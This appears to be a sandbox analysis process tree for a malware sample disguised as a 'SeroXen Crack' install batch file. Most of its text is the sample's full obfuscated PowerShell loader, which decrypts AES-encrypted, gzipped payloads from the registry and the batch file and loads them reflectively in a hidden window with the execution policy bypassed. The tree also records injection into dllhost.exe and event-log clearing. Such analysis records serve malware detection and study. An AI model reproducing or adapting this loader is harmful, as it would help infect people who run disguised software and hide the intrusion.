C:\Windows\$sxr-powershell.exeC:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function hufeg($iDMxb){ $Elzpw=[System.Security.Cryptography.Aes]::Create(); $Elzpw.Mode=[System.Security.Cryptography.CipherMode]::CBC; $Elzpw.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $Elzpw.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk='); $Elzpw.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA=='); $wCTZr=$Elzpw.('rotpyrceDetaerC'[-1..-15] -join '')(); $YgtPo=$wCTZr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iDMxb, 0, $iDMxb.Length); $wCTZr.Dispose(); $Elzpw.Dispose(); $YgtPo;}function FJcTY($iDMxb){ $KHdof=New-Object System.IO.MemoryStream(,$iDMxb); $mdDGq=New-Object System.IO.MemoryStream; $PZsap=New-Object System.IO.Compression.GZipStream($KHdof, [IO.Compression.CompressionMode]::Decompress); $PZsap.CopyTo($mdDGq); $PZsap.Dispose(); $KHdof.Dispose(); $mdDGq.Dispose(); $mdDGq.ToArray();}function vUmWc($iDMxb,$PbTpW){ $YHPse=[System.Reflection.Assembly]::Load([byte[]]$iDMxb); $aMqIy=$YHPse.EntryPoint; $aMqIy.Invoke($null, $PbTpW);}$Elzpw1 = New-Object System.Security.Cryptography.AesManaged;$Elzpw1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$Elzpw1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$Elzpw1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk=');$Elzpw1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA==');$lkChZ = $Elzpw1.('rotpyrceDetaerC'[-1..-15] -join '')();$kveij = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('skxuT638mXYXO82tnMu4Nw==');$kveij = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij, 0, $kveij.Length);$kveij = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij);$uYwHJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7tPhtRoBPpmbD4jKqCrROmZ5ihpYMWVokvpj2Ng/Pz8=');$uYwHJ = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uYwHJ, 0, $uYwHJ.Length);$uYwHJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uYwHJ);$XPhKE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MN4dM3v9612JtLqaveCMYg==');$XPhKE = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XPhKE, 0, $XPhKE.Length);$XPhKE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XPhKE);$muibj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('omE0gz6POPNwhNmUAnPGH44LhwPPACLWik/KT0dk5wsKXAxtKag+L5FPGR5kaqhlGUck2HtfdRNBwrYMOEAetiGgAox0exmtDDnAYLadphZBvi4OP8B8BNL4k5y/z1AEr7oudmgyCQifH3aXxa/gUUa4xjDsSD2YTOub7PHlsdmqG91RSBUMJH4vfT2zptSsj0OSscQsY4xVPZ8OjeRKbzP+BjF+Uue1s9LcXQdrizsUEKJN4dY28g0skU19VzfudgJv7Qa+SS93YCgWa9n+oNhygZquca/xgmF4Z+su7WedF+8tBgUKzviRtdEdVgLq/OMSlirCLjvFnSHC2y9K1oTEEyD1mQB836kwPebOOTmBNH6vdn2bEQQYiF/vc3FItt5vYPuWyJGzUen95KOQjYu7YoPz/dFXDUgmI65vnuw=');$muibj = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($muibj, 0, $muibj.Length);$muibj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($muibj);$DHHcr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tYnkG6mWBgWnZf6oIR3L5A==');$DHHcr = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DHHcr, 0, $DHHcr.Length);$DHHcr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DHHcr);$EQNXr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5fF2zWzAZ0BefyD1XaGcLw==');$EQNXr = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($EQNXr, 0, $EQNXr.Length);$EQNXr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($EQNXr);$mYQZS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3I7S8iNpJjrn0k9Lgckneg==');$mYQZS = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mYQZS, 0, $mYQZS.Length);$mYQZS = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mYQZS);$DbkFT = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v8BsdeVWD9I78LbbRhRFrA==');$DbkFT = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DbkFT, 0, $DbkFT.Length);$DbkFT = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DbkFT);$jgfOd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OEFFbXtp5W2U1hAoq0CpPw==');$jgfOd = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jgfOd, 0, $jgfOd.Length);$jgfOd = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jgfOd);$kveij0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1+Vym/OwDnC1v1RFNGQ5MA==');$kveij0 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij0, 0, $kveij0.Length);$kveij0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij0);$kveij1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1UB7UYof3ztQu3+ei666DQ==');$kveij1 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij1, 0, $kveij1.Length);$kveij1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij1);$kveij2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9594UuKb/Z+/WVWczIhxbQ==');$kveij2 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij2, 0, $kveij2.Length);$kveij2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij2);$kveij3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lxkDZyakK1CM3mmPkfi6OQ==');$kveij3 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij3, 0, $kveij3.Length);$kveij3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij3);$lkChZ.Dispose();$Elzpw1.Dispose();if (@(get-process -ea silentlycontinue $kveij3).count -gt 1) {exit};$ebqGe = [Microsoft.Win32.Registry]::$DbkFT.$mYQZS($kveij).$EQNXr($uYwHJ);$SceND=[string[]]$ebqGe.Split('\');$sNXpr=FJcTY(hufeg([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($SceND[1])));vUmWc $sNXpr (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$GiWwX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($SceND[0]);$Elzpw = New-Object System.Security.Cryptography.AesManaged;$Elzpw.Mode = [System.Security.Cryptography.CipherMode]::CBC;$Elzpw.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$Elzpw.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk=');$Elzpw.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA==');$wCTZr = $Elzpw.('rotpyrceDetaerC'[-1..-15] -join '')();$GiWwX = $wCTZr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GiWwX, 0, $GiWwX.Length);$wCTZr.Dispose();$Elzpw.Dispose();$KHdof = New-Object System.IO.MemoryStream(, $GiWwX);$mdDGq = New-Object System.IO.MemoryStream;$PZsap = New-Object System.IO.Compression.GZipStream($KHdof, [IO.Compression.CompressionMode]::$kveij1);$PZsap.$jgfOd($mdDGq);$PZsap.Dispose();$KHdof.Dispose();$mdDGq.Dispose();$GiWwX = $mdDGq.ToArray();$cyNnW = $muibj | IEX;$YHPse = $cyNnW::$kveij2($GiWwX);$aMqIy = $YHPse.EntryPoint;$aMqIy.$kveij0($null, (, [string[]] ($XPhKE)))4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Hide Artifacts: Hidden Window
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4556 -
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{5f8849d2-48c8-45d2-bd93-62c997e79794}5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3468
-
-
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4556).WaitForExit();[System.Threading.Thread]::Sleep(5000); function hufeg($iDMxb){ $Elzpw=[System.Security.Cryptography.Aes]::Create(); $Elzpw.Mode=[System.Security.Cryptography.CipherMode]::CBC; $Elzpw.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $Elzpw.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk='); $Elzpw.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA=='); $wCTZr=$Elzpw.('rotpyrceDetaerC'[-1..-15] -join '')(); $YgtPo=$wCTZr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iDMxb, 0, $iDMxb.Length); $wCTZr.Dispose(); $Elzpw.Dispose(); $YgtPo;}function FJcTY($iDMxb){ $KHdof=New-Object System.IO.MemoryStream(,$iDMxb); $mdDGq=New-Object System.IO.MemoryStream; $PZsap=New-Object System.IO.Compression.GZipStream($KHdof, [IO.Compression.CompressionMode]::Decompress); $PZsap.CopyTo($mdDGq); $PZsap.Dispose(); $KHdof.Dispose(); $mdDGq.Dispose(); $mdDGq.ToArray();}function vUmWc($iDMxb,$PbTpW){ $YHPse=[System.Reflection.Assembly]::Load([byte[]]$iDMxb); $aMqIy=$YHPse.EntryPoint; $aMqIy.Invoke($null, $PbTpW);}$Elzpw1 = New-Object System.Security.Cryptography.AesManaged;$Elzpw1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$Elzpw1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$Elzpw1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk=');$Elzpw1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA==');$lkChZ = $Elzpw1.('rotpyrceDetaerC'[-1..-15] -join '')();$kveij = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('skxuT638mXYXO82tnMu4Nw==');$kveij = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij, 0, $kveij.Length);$kveij = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij);$uYwHJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7tPhtRoBPpmbD4jKqCrROmZ5ihpYMWVokvpj2Ng/Pz8=');$uYwHJ = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uYwHJ, 0, $uYwHJ.Length);$uYwHJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uYwHJ);$XPhKE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MN4dM3v9612JtLqaveCMYg==');$XPhKE = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XPhKE, 0, $XPhKE.Length);$XPhKE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XPhKE);$muibj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('omE0gz6POPNwhNmUAnPGH44LhwPPACLWik/KT0dk5wsKXAxtKag+L5FPGR5kaqhlGUck2HtfdRNBwrYMOEAetiGgAox0exmtDDnAYLadphZBvi4OP8B8BNL4k5y/z1AEr7oudmgyCQifH3aXxa/gUUa4xjDsSD2YTOub7PHlsdmqG91RSBUMJH4vfT2zptSsj0OSscQsY4xVPZ8OjeRKbzP+BjF+Uue1s9LcXQdrizsUEKJN4dY28g0skU19VzfudgJv7Qa+SS93YCgWa9n+oNhygZquca/xgmF4Z+su7WedF+8tBgUKzviRtdEdVgLq/OMSlirCLjvFnSHC2y9K1oTEEyD1mQB836kwPebOOTmBNH6vdn2bEQQYiF/vc3FItt5vYPuWyJGzUen95KOQjYu7YoPz/dFXDUgmI65vnuw=');$muibj = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($muibj, 0, $muibj.Length);$muibj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($muibj);$DHHcr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tYnkG6mWBgWnZf6oIR3L5A==');$DHHcr = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DHHcr, 0, $DHHcr.Length);$DHHcr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DHHcr);$EQNXr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5fF2zWzAZ0BefyD1XaGcLw==');$EQNXr = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($EQNXr, 0, $EQNXr.Length);$EQNXr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($EQNXr);$mYQZS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3I7S8iNpJjrn0k9Lgckneg==');$mYQZS = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mYQZS, 0, $mYQZS.Length);$mYQZS = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mYQZS);$DbkFT = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v8BsdeVWD9I78LbbRhRFrA==');$DbkFT = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DbkFT, 0, $DbkFT.Length);$DbkFT = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DbkFT);$jgfOd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OEFFbXtp5W2U1hAoq0CpPw==');$jgfOd = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jgfOd, 0, $jgfOd.Length);$jgfOd = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jgfOd);$kveij0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1+Vym/OwDnC1v1RFNGQ5MA==');$kveij0 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij0, 0, $kveij0.Length);$kveij0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij0);$kveij1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1UB7UYof3ztQu3+ei666DQ==');$kveij1 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij1, 0, $kveij1.Length);$kveij1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij1);$kveij2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9594UuKb/Z+/WVWczIhxbQ==');$kveij2 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij2, 0, $kveij2.Length);$kveij2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij2);$kveij3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lxkDZyakK1CM3mmPkfi6OQ==');$kveij3 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij3, 0, $kveij3.Length);$kveij3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij3);$lkChZ.Dispose();$Elzpw1.Dispose();if (@(get-process -ea silentlycontinue $kveij3).count -gt 1) {exit};$ebqGe = [Microsoft.Win32.Registry]::$DbkFT.$mYQZS($kveij).$EQNXr($uYwHJ);$SceND=[string[]]$ebqGe.Split('\');$sNXpr=FJcTY(hufeg([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($SceND[1])));vUmWc $sNXpr (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$GiWwX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($SceND[0]);$Elzpw = New-Object System.Security.Cryptography.AesManaged;$Elzpw.Mode = [System.Security.Cryptography.CipherMode]::CBC;$Elzpw.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$Elzpw.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk=');$Elzpw.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA==');$wCTZr = $Elzpw.('rotpyrceDetaerC'[-1..-15] -join '')();$GiWwX = $wCTZr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GiWwX, 0, $GiWwX.Length);$wCTZr.Dispose();$Elzpw.Dispose();$KHdof = New-Object System.IO.MemoryStream(, $GiWwX);$mdDGq = New-Object System.IO.MemoryStream;$PZsap = New-Object System.IO.Compression.GZipStream($KHdof, [IO.Compression.CompressionMode]::$kveij1);$PZsap.$jgfOd($mdDGq);$PZsap.Dispose();$KHdof.Dispose();$mdDGq.Dispose();$GiWwX = $mdDGq.ToArray();$cyNnW = $muibj | IEX;$YHPse = $cyNnW::$kveij2($GiWwX);$aMqIy = $YHPse.EntryPoint;$aMqIy.$kveij0($null, (, [string[]] ($XPhKE)))5⤵
- Executes dropped EXE
- Hide Artifacts: Hidden Window
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4752
-
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{0aaa8d3e-e49f-44eb-9edb-20e18daa037e}5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4832
-
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{8bdaa3f9-3feb-41e2-a323-515549fa26f2}5⤵
- System Location Discovery: System Language Discovery
PID:5732
-
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{beb58a35-1b48-43d2-9b66-b8f26123a6c3}5⤵PID:6052
-
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{ea371ad6-b0f1-4bcf-80a0-84848f71342e}5⤵
- System Location Discovery: System Language Discovery
PID:72
-
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{d9514771-1c6c-479d-b5f0-b15262a44485}5⤵
- System Location Discovery: System Language Discovery
PID:4908 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 4686⤵
- Program crash
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Enumerates system info in registry
PID:4568
-
-
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{389b6b8a-fd19-4fa2-af35-c2dd51ecbf24}5⤵
- System Location Discovery: System Language Discovery
PID:2704
-
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{a01933c4-0ac8-4cf8-becc-e6efdaa51317}5⤵
- System Location Discovery: System Language Discovery
PID:3688
-
-
-
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵PID:1268
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1316
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1328
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1444
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2980
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:1584
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1680
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1712
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1744
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1752
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1844
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1924
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1108
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1984
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2056
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2064
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2104
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2240
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2316
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2328
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2536
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2544
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:2596
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2664
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2672
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2688
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
PID:2696
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2716
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2364
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3152
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3384
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SeroXen Crack\SeroXen-install.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:3844 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2376
-
-
C:\Users\Admin\AppData\Local\Temp\SeroXen Crack\SeroXen-install.bat.exe"SeroXen-install.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function agDFc($vCpVI){ $Qviqn=[System.Security.Cryptography.Aes]::Create(); $Qviqn.Mode=[System.Security.Cryptography.CipherMode]::CBC; $Qviqn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $Qviqn.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eSyKXuxugFflvGlW9qE6Iqg8XcAom2v4/DjQoKKC570='); $Qviqn.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9iro50udEDaxZ/wkUff9RA=='); $FmMlx=$Qviqn.CreateDecryptor(); $return_var=$FmMlx.TransformFinalBlock($vCpVI, 0, $vCpVI.Length); $FmMlx.Dispose(); $Qviqn.Dispose(); $return_var;}function cZEYh($vCpVI){ $WLTiH=New-Object System.IO.MemoryStream(,$vCpVI); $KNxYU=New-Object System.IO.MemoryStream; $LOvEr=New-Object System.IO.Compression.GZipStream($WLTiH, [IO.Compression.CompressionMode]::Decompress); $LOvEr.CopyTo($KNxYU); $LOvEr.Dispose(); $WLTiH.Dispose(); $KNxYU.Dispose(); $KNxYU.ToArray();}function fELFD($vCpVI,$TXpag){ $fzHaG=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$vCpVI); $UtByz=$fzHaG.EntryPoint; $UtByz.Invoke($null, $TXpag);}$QLGin=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\SeroXen Crack\SeroXen-install.bat').Split([Environment]::NewLine);foreach ($AkEcQ in $QLGin) { if ($AkEcQ.StartsWith('SEROXEN')) { $fJBxd=$AkEcQ.Substring(7); break; }}$CjuJm=[string[]]$fJBxd.Split('\');$hxBpb=cZEYh (agDFc ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($CjuJm[0])));$OyvxC=cZEYh (agDFc ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($CjuJm[1])));fELFD $OyvxC (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));fELFD $hxBpb (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Deletes itself
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4320 -
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{f750a443-2575-4881-ada0-0deca7d43552}4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2228
-
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{bf3b8d48-8709-4726-8420-0cfa5183c3d1}4⤵PID:1920
-
-
